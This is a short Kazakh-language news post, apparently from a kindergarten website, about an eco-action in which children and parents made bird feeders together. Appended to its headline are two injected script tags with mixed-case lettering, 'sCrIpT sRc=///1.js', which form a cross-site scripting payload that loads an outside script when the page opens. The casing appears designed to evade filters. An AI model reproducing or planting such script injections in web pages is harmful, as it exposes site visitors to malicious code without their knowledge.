«Алтын бесік» бөбекжайында «Біртұтас тәрбие» республикалық бағдарламасы аясында «Эко-жемсауыт» атты экологиялық акция өтті.<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

24.04.2025

 Шараның басты мақсаты – балалардың табиғатқа деген сүйіспеншілігін қалыптастыру, экологиялық мәдениетін дамыту және ата-аналарды балалармен бірлескен іс-әрекетке тарту болды.Акция барысында тәрбиеленушілер ата-аналарымен бірге экологиялық тұрғыдан қауіпсіз әрі табиғи материалдардан жасалған құстарға арналған жемсауыттарын дайындады. Әр отбасы өз шығармашылығын танытып, ыңғайлы да әсем үлгілерді таңдап, оларды балабақша аумағына іліп қойды.Осындай шаралардың арқасында балалар жануарларға қамқор болуды үйреніп, қоршаған ортаны қорғаудың маңыздылығын түсінеді. Сонымен қатар бөбекжай мен ата-аналар арасындағы серіктестік қарым-қатынас та нығая түседі.
Экологиялық тәрбиелеуге белсенді қатысып, шынайы жанашырлық танытқандары үшін барлық ата-аналарға үлкен алғысымызды білдіреміз!
 

 

Просмотров: 319

Қосымшалар:



Пікір қосу



Деректерді қолтаңбаға қосу
Текст